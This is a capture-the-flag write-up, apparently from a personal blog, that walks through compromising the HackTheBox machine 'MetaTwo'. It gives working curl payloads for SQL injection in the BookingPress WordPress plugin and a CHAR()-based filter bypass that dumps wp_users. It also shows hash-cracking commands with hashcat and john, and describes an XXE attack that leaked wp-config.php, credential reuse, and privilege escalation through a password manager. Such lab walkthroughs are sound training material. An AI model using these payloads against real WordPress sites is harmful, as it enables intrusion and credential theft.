HTB: MetaTwo

ShellPunk

Jorge Moreno / November 16, 2022

5 min read––– views

Reconnaissance

As always, the first step is Reconnaissance, but in this case is not necessary cause is a CTF. So, we start with Scanning and launch our nmap:

nmap -sV -sC -oA 10.10.11.186

As you can see in the image above, in the port 80 is present an url. This is a reference to the domain name which is being used by a web page. Go to /etc/hosts file and add that domain name and IP.

Next, we can access to metapress.htb/events like show in the main page and play around with the options of the page.

The most interesting part is this WordPress booking component. Looking at the source code I found the name of this component and version.

Vulnerability Analysis

With the data obtained you can do a research on Internet. In a few minutes I found bookingpress vulnerability. Easy peasy, right?

Sql Injection

The key part for this vulnerability to work is a field named _wpnonce located on the source code of bookingpress component.

Using that field and data is posible enumerate some information from the database.

curl -i 'https://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=7c71a4df9b&category_id=33&total_service=-7502) \
				UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

As you can see, in the field bookingpress_service_id is filled with the information that I query using sql injection.

Next, I enumerate databases from information_schema.schemata

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=7c71a4df9b&category_id=33&total_service=-7502) \
UNION ALL SELECT (select group_concat(schema_name) from information_schema.schemata),1,2,3,4,5,6,7,8-- -'

Here, the target database is blog

The next step is enumerate tables. Looks like something is not working with our query, after some test I discovered there is a filter with specific chars.

1 union select 1,1,char(116,101,120,116),user_login,user_pass,null,0,0,null,null,null,null,null,null,null,null,null from wp_users

To bypass this filter I use mysql function CHAR() with the corresponding ASCII representation. At the end was possible enumerate tables.

I dump all users. The most important one is admin, but in some cases (like this) only can break into the system with the least privileged user.

Cracking Password Hashes

In this case to do a brute force attack against the password hashes I use the famous wordlist rockyou and hashcat

hashcat -m 400 hashes.txt /usr/share/wordlists/rockyou.txt

In just a few minutes Hashcat found the password of manager user. I test this password in ftp and ssh service in order to check if the user is reusing passwords. No luck.

XXE Authenticated

With the creds for manager user was posible to identify the feature of upload files to the site which is very interesting. Using searchsploit was possible identify the next step.

Research around this exploit I found this interesting article about XXE vulnerability.

Exploitation

Following the above article and the exploit in searchsploit I was able to craft/weaponize a wav file to deliver in the target.

I run a http server in my local machine, the target reads the xx3.dtd file and finally prints the wp_config.php file compressed and encoded in base64 using a GET request to my local machine. Beautiful!

I use a php function to decompress and decode the base64 string

<?php echo zlib_decode(base64_decode('$base64')); ?>

And finally we can see the content of the file in plain text with two very useful passwords.

As before I use this passwords to check if I can use it in ssh service. Again, no luck.

So, go for FTP service and connect and is possible to have access to two directories. The blog directory contains the entire Wordpress site with nothing interesting.

In the mailer directory is where I found what I was looking for. An user and password to access SSH

I enter the creds on ssh and get the user.txt file.

Privilege Escalation

Looking around in order to find a way to escalate privileges I found a directory with interesting pgp keys. The Passpie is an password manager.

I download the .keys file and extract the private key. Then use gpg2john to convert to john format and crack it.

gpg2john private_key_file > private.key

Then I just use john with rockyou wordlist

john -w=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt private.key

When I get the password from john I use it to export the passwords saved in Passpie.

jnelson@meta2:~$ passpie export passes.txt

With the password in plain text I login with root user and read the root.txt file.

# log like root user
su

# change directory to root
cd /root

# get root flag
cat root.txt

Summary

As we can see. Is highly recommended to keep updated WordPress, and mainly its plugins must keep patched and updated.

Is a good option to keep the passwords and secrets in environment variables instead of in plain text in configuration files. In the case of file disclosure attacks is a protection that help us.

Use complex passwords in all accounts and products to do difficult to attackers to break them.

Thank you!

I apologize for my English. I have a lot for improve.

Thanks for reading!

Subscribe to the newsletter

Get emails from me about hacking, ctf, software development and all new articles.

- subscribers – View all issues

Discuss on TwitterSuggest Change